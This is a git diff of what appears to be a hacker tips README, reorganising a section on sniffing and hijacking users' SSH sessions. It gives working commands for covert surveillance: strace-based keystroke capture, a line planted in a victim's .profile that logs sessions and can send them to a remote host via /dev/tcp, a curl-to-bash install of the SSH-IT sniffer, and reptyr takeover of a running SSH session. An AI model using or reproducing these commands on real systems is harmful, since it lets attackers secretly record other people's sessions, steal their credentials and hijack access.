diff --git a/README.md b/README.md index dc1fde8..edcd059 100644 --- a/README.md +++ b/README.md @@ -80,11 +80,12 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [cryptsetup](#crypto-filesystem) 1. [EncFS](#encfs) 1. [Encrypting a file](#encrypting-file) -1. [Sniffing a user's SSH session](#ssh-sniffing) - 1. [with strace](#ssh-sniffing-strace) - 1. [with script](#ssh-sniffing-script) - 1. [with a wrapper script](#ssh-sniffing-wrapper) - 1. [with SSH-IT](#ssh-sniffing-sshit) +1. [SSH session sniffing and hijaking](#ssh-sniffing) + 1. [Sniff a user's SHELL session with script](#ssh-sniffing-script) + 1. [Sniff a user's outgoing SSH session with strace](#ssh-sniffing-strace) + 1. [Sniff a user's outgoing SSH session with a wrapper script](#ssh-sniffing-wrapper) + 1. [Sniff a user's outgoing SSH session with SSH-IT](#ssh-sniffing-sshit) + 1. [Hijak / Take-over a running SSH session](#hijak) 1. [VPN and Shells](#vpn-shell) 1. [Disposable Root Servers](#shell) 1. [VPN/VPS Providers](#vpn) @@ -1566,15 +1567,10 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input. --- ## 9. SSH Sniffing - -**9.i Sniff a user's SSH session with strace** -```sh -strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done -``` -Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. - -**9.ii Sniff a user's SSH session with script** +**9.i Sniff a user's SHELL session with script** + +A method to log the shell session of a user (who logged in via SSH). The tool 'script' has been part of Unix for decades. Add 'script' to the user's .profile. The user's keystrokes and session will be recorded to ~/.ssh-log.txt the next time the user logs in: ```sh @@ -1582,10 +1578,18 @@ echo 'exec script -qc /bin/bash ~/.ssh-log.txt' >>~/.profile ``` Consider using [zap-args](#bash-hide-arguments) to hide the the arguments and /dev/tcp/3.13.3.7/1524 as an output file to log to a remote host. - -**9.iii. Sniff a user's SSH session with a wrapper script** + +**9.ii Sniff a user's outgoing SSH session with strace** +```sh +strace -e trace=read -p 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done +``` +Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control. -Even dirtier way in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH clients unless uid=0) + + +**9.iii. Sniff a user's outgoing SSH session with a wrapper script** + +Even dirtier method in case */proc/sys/kernel/yama/ptrace_scope* is set to 1 (strace will fail on already running SSH sessions) Create a wrapper script called 'ssh' that executes strace + ssh to log the session:
@@ -1629,7 +1633,7 @@ To uninstall cut & paste this\033[0m:\033[1;36m The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the user logs into his shell and uses SSH. -**9.iv Sniff a user's SSH session using SSH-IT** +**9.iv Sniff a user's outgoing SSH session using SSH-IT** The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/). @@ -1637,6 +1641,16 @@ The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-i bash -c "$(curl -fsSL https://thc.org/ssh-it/x)" ``` + +**9.v Hijak / Take-over a running SSH session** + +Use [https://github.com/nelhage/reptyr](https://github.com/nelhage/reptyr) to take over an existing SSH session: +```sh +ps alxww | grep ssh +./reptyr +### or: ./reptyr $(pidof -s ssh) +``` + --- ## 10. VPN & Shells